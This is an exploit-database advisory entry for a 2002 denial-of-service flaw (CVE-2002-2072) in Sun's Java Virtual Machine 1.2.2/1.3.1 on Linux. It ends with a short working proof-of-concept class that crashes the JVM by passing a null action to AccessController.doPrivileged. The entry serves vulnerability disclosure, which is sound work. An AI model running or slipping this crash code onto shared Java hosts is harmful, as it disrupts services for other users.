Sun Java Virtual Machine 1.2.2/1.3.1 - Segmentation Violation

Author: Taeho Oh
type: local
platform: linux
port: 
date_added: 2002-01-30 
date_updated: 2012-09-11 
verified: 1 
codes: CVE-2002-2072;OSVDB-60054 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/3992/info

Java programs run in an intepreted environment, the Java Virtual Machine (JVM). Sun has provided a reference JVM implementation for multiple platforms, including Solaris, Windows and Linux.

It is possible for a maliciously constructed, valid java program to crash the Sun JVM. This may result in a denial of service attack in a shared environment. The ability to consistantly exploit this vulnerability has been demonstrated on the Linux version of the Sun JVM.

public class CrashMe
{
    public static void main(String[] args)
    {
        java.security.AccessController.doPrivileged
        ((java.security.PrivilegedAction)null);
    }
}